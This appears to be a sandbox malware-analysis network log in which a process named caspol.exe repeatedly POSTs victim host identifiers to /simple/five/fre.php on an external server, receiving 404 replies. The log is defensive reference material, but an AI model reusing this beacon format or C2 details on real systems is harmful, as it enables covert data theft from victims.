                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.224920294.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:30.986397028 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:30.992768049 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:31.706429005 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:31 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.224920394.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:32.058171988 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:32.063041925 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:32.783813000 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:32 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.224920494.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:32.920535088 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:32.925554991 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:33.768088102 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:33 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.224920594.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:33.900855064 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:33.906029940 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:34.636761904 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:34 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.224920694.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:34.782082081 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:34.787024021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:35.506217003 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:35 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.224920794.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:35.650070906 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:35.655030012 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:36.384850025 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:36 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.224920894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:36.525110006 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:36.530040979 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:37.243896008 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:37 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.224920994.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:37.380793095 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:37.385968924 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:38.095659018 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:37 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.224921094.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:38.240227938 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:38.245541096 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:38.955806971 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:38 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.224921194.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:39.095318079 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:39.100303888 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:39.954087973 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:39 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.224921294.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:40.094630957 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:40.099524021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:40.816035032 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:40 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.224921394.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:40.952683926 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:40.957521915 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:41.675704002 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:41 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.224921494.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:41.828788042 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:41.834156990 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:42.543483973 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:42 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.224921594.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:42.685653925 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:42.690841913 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:43.544902086 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:43 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.224921694.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:43.680879116 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:43.687015057 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:44.541507006 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:44 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.224921794.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:44.681811094 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:44.686743021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:45.533421993 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:45 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.224921894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:45.678222895 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:45.683161974 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:46.391887903 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:46 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.224921994.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:46.567030907 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:46.572052002 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:47.435107946 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.224922094.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:47.620480061 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:47.625431061 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:48.350254059 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:48 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


